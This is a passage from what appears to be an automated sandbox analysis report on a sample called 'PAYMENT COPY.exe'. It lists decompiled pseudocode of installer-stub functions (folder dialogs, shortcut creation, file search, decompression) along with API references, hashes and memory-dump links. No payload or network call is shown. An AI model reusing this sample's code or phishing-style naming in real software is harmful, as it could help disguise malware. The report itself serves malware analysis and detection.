								E00405BE5(_t146);
								_t125 =  *((intOrPtr*)( *0x42f454 + 0x11c));
								if( *((intOrPtr*)( *0x42f454 + 0x11c)) != 0 && _t146 == "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp") {
									E004062E0(_t146, 0x42a8b8, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3e0, 0x42a8b8) != 0) {
										lstrcatA(_t146, 0x42e3e0);
									}
								}
								 *0x42a8a8 =  *0x42a8a8 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405C52(_t146) != 0 && E00405C7E(_t146) == 0) {
						E00405BE5(_t146);
					}
					 *0x42ec18 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042D1(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042D1(_t166);
					E00404306(_t165);
					_t138 = E00406656(8);
					if(_t138 == 0) {
						L53:
						return E00404338(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                                                    0x00404763
                                                                    0x00404769
                                                                    0x0040476f
                                                                    0x0040477c
                                                                    0x0040478a
                                                                    0x0040478d
                                                                    0x00404795
                                                                    0x0040479b
                                                                    0x0040479b
                                                                    0x004047a7
                                                                    0x004047aa
                                                                    0x00404818
                                                                    0x0040481f
                                                                    0x004048f6
                                                                    0x004048fd
                                                                    0x0040490c
                                                                    0x0040490c
                                                                    0x00404910
                                                                    0x0040491a
                                                                    0x00404927
                                                                    0x00404929
                                                                    0x00404929
                                                                    0x00404937
                                                                    0x0040493e
                                                                    0x00404945
                                                                    0x00404948
                                                                    0x0040497f
                                                                    0x00404981
                                                                    0x00404987
                                                                    0x0040498c
                                                                    0x00404990
                                                                    0x00404992
                                                                    0x00404992
                                                                    0x004049ae
                                                                    0x00000000
                                                                    0x004049b0
                                                                    0x004049b3
                                                                    0x004049c1
                                                                    0x004049c7
                                                                    0x004049c8
                                                                    0x004049cb
                                                                    0x004049ce
                                                                    0x00000000
                                                                    0x004049ce
                                                                    0x0040494a
                                                                    0x0040494c
                                                                    0x00404950
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404952
                                                                    0x00404952
                                                                    0x0040495f
                                                                    0x00404964
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404968
                                                                    0x0040496a
                                                                    0x0040496a
                                                                    0x00404972
                                                                    0x00404974
                                                                    0x00404977
                                                                    0x0040497a
                                                                    0x0040497d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040497d
                                                                    0x004049da
                                                                    0x004049e4
                                                                    0x004049e7
                                                                    0x004049ea
                                                                    0x004049f1
                                                                    0x004049f1
                                                                    0x004049f3
                                                                    0x004049f3
                                                                    0x004049f8
                                                                    0x004049fa
                                                                    0x00404a02
                                                                    0x00404a09
                                                                    0x00404a0b
                                                                    0x00404a16
                                                                    0x00404a16
                                                                    0x00404a0b
                                                                    0x00404a1d
                                                                    0x00404a26
                                                                    0x00404a30
                                                                    0x00404a38
                                                                    0x00404a53
                                                                    0x00404a3a
                                                                    0x00404a43
                                                                    0x00404a43
                                                                    0x00404a38
                                                                    0x00404a58
                                                                    0x00404a5d
                                                                    0x00404a62
                                                                    0x00404a6b
                                                                    0x00404a6b
                                                                    0x00404a74
                                                                    0x00404a76
                                                                    0x00404a76
                                                                    0x00404a82
                                                                    0x00404a8a
                                                                    0x00404a94
                                                                    0x00404a94
                                                                    0x00404a99
                                                                    0x00000000
                                                                    0x00404a99
                                                                    0x00404948
                                                                    0x004048ff
                                                                    0x00404906
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404906
                                                                    0x00404825
                                                                    0x0040482e
                                                                    0x00404848
                                                                    0x0040484d
                                                                    0x00404857
                                                                    0x0040485e
                                                                    0x0040486a
                                                                    0x0040486d
                                                                    0x00404870
                                                                    0x00404877
                                                                    0x0040487f
                                                                    0x00404882
                                                                    0x00404886
                                                                    0x0040488d
                                                                    0x00404895
                                                                    0x004048ef
                                                                    0x00404897
                                                                    0x00404898
                                                                    0x0040489f
                                                                    0x004048a9
                                                                    0x004048b1
                                                                    0x004048be
                                                                    0x004048d2
                                                                    0x004048d6
                                                                    0x004048d6
                                                                    0x004048d2
                                                                    0x004048db
                                                                    0x004048e8
                                                                    0x004048e8
                                                                    0x00404895
                                                                    0x00000000
                                                                    0x0040484d
                                                                    0x0040483b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404841
                                                                    0x00000000
                                                                    0x004047ac
                                                                    0x004047b9
                                                                    0x004047c2
                                                                    0x004047cf
                                                                    0x004047cf
                                                                    0x004047d6
                                                                    0x004047dc
                                                                    0x004047e5
                                                                    0x004047e8
                                                                    0x004047eb
                                                                    0x004047f3
                                                                    0x004047f6
                                                                    0x004047f9
                                                                    0x004047ff
                                                                    0x00404806
                                                                    0x0040480d
                                                                    0x00404a9f
                                                                    0x00404ab1
                                                                    0x00404813
                                                                    0x00404816
                                                                    0x00000000
                                                                    0x00404816
                                                                    0x0040480d

                                                                    APIs
                                                                    • GetDlgItem.USER32 ref: 004047B2
                                                                    • SetWindowTextA.USER32(00000000,?), ref: 004047DC
                                                                    • SHBrowseForFolderA.SHELL32(?,00429C90,?), ref: 0040488D
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404898
                                                                    • lstrcmpiA.KERNEL32(Call,0042A8B8,00000000,?,?), ref: 004048CA
                                                                    • lstrcatA.KERNEL32(?,Call), ref: 004048D6
                                                                    • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004048E8
                                                                      • Part of subcall function 0040594D: GetDlgItemTextA.USER32 ref: 00405960
                                                                      • Part of subcall function 00406528: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PAYMENT COPY.exe" ,76D7FA90,C:\Users\user~1\AppData\Local\Temp\,00000000,00403461,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
                                                                      • Part of subcall function 00406528: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
                                                                      • Part of subcall function 00406528: CharNextA.USER32(?,"C:\Users\user\Desktop\PAYMENT COPY.exe" ,76D7FA90,C:\Users\user~1\AppData\Local\Temp\,00000000,00403461,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
                                                                      • Part of subcall function 00406528: CharPrevA.USER32(?,?,76D7FA90,C:\Users\user~1\AppData\Local\Temp\,00000000,00403461,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2
                                                                    • GetDiskFreeSpaceA.KERNEL32(00429888,?,?,0000040F,?,00429888,00429888,?,00000001,00429888,?,?,000003FB,?), ref: 004049A6
                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049C1
                                                                      • Part of subcall function 00404B1A: lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
                                                                      • Part of subcall function 00404B1A: wsprintfA.USER32 ref: 00404BC0
                                                                      • Part of subcall function 00404B1A: SetDlgItemTextA.USER32(?,0042A8B8), ref: 00404BD3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: A$C:\Users\user~1\AppData\Local\Temp$Call
                                                                    • API String ID: 2624150263-3151243185
                                                                    • Opcode ID: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
                                                                    • Instruction ID: b89c9f0b9ad2a5e463b1d4baa2297f7fe0657747611b748bc5d4715ca5df860c
                                                                    • Opcode Fuzzy Hash: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
                                                                    • Instruction Fuzzy Hash: A9A17DB1A00209ABDB11AFA5C941AAF77B8EF84314F14843BF601B62D1DB7C99518F6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 74%
                                                                    			E0040216B(void* __eflags) {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405C52( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                                                                    0x00402174
                                                                    0x0040217e
                                                                    0x00402188
                                                                    0x00402195
                                                                    0x004021a0
                                                                    0x004021a3
                                                                    0x004021bd
                                                                    0x004021c3
                                                                    0x004021c9
                                                                    0x004021cc
                                                                    0x004021d6
                                                                    0x004021da
                                                                    0x004021da
                                                                    0x004021df
                                                                    0x004021f0
                                                                    0x004021f8
                                                                    0x004022d4
                                                                    0x004022d4
                                                                    0x004022db
                                                                    0x004021fe
                                                                    0x004021fe
                                                                    0x0040220d
                                                                    0x00402211
                                                                    0x00402214
                                                                    0x0040221a
                                                                    0x00402228
                                                                    0x0040222b
                                                                    0x0040222d
                                                                    0x00402238
                                                                    0x00402238
                                                                    0x0040223d
                                                                    0x0040223f
                                                                    0x00402246
                                                                    0x00402246
                                                                    0x00402249
                                                                    0x00402252
                                                                    0x00402255
                                                                    0x0040225a
                                                                    0x0040225c
                                                                    0x00402269
                                                                    0x00402269
                                                                    0x0040226c
                                                                    0x00402278
                                                                    0x0040227b
                                                                    0x00402284
                                                                    0x0040228a
                                                                    0x00402291
                                                                    0x004022aa
                                                                    0x004022ac
                                                                    0x004022ba
                                                                    0x004022ba
                                                                    0x004022aa
                                                                    0x004022bd
                                                                    0x004022c3
                                                                    0x004022c3
                                                                    0x004022c6
                                                                    0x004022cc
                                                                    0x004022d2
                                                                    0x004022e7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004022d2
                                                                    0x004022dd
                                                                    0x00402a5d
                                                                    0x00402a69

                                                                    APIs
                                                                    • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                    Strings
                                                                    • C:\Users\user~1\AppData\Local\Temp, xrefs: 00402230
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ByteCharCreateInstanceMultiWide
                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp
                                                                    • API String ID: 123533781-3107243751
                                                                    • Opcode ID: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
                                                                    • Instruction ID: b205fa0f6c371e5dc37930ac793058e6edb3c03a2887874d4a759486fbbeee3c
                                                                    • Opcode Fuzzy Hash: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
                                                                    • Instruction Fuzzy Hash: F5511671A00208AFCB50DFE4CA88E9D7BB6EF48314F2041BAF515EB2D1DA799981CB14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 39%
                                                                    			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E004061AB(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E0040624D();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                    0x004027b9
                                                                    0x004027cd
                                                                    0x004027d8
                                                                    0x004027d9
                                                                    0x00402918
                                                                    0x004027bb
                                                                    0x004027bb
                                                                    0x004027bd
                                                                    0x004027bf
                                                                    0x004027bf
                                                                    0x00402a5d
                                                                    0x00402a69

                                                                    APIs
                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileFindFirst
                                                                    • String ID:
                                                                    • API String ID: 1974802433-0
                                                                    • Opcode ID: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
                                                                    • Instruction ID: 52cf83cb61f6f27ed997ed7cc61b6938fc353794e3a771b70e6184720e28d6c0
                                                                    • Opcode Fuzzy Hash: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
                                                                    • Instruction Fuzzy Hash: B3F0A771604110DFD710EB649A49AEE77689F51314F6005BFF102F21C1D6B849469B3A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00406A9B, Relevance: .3, Instructions: 334COMMONCrypto
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 79%
                                                                    			E00406A9B(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E0040720A( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x408408; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x408408; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00407272( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004071CA))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
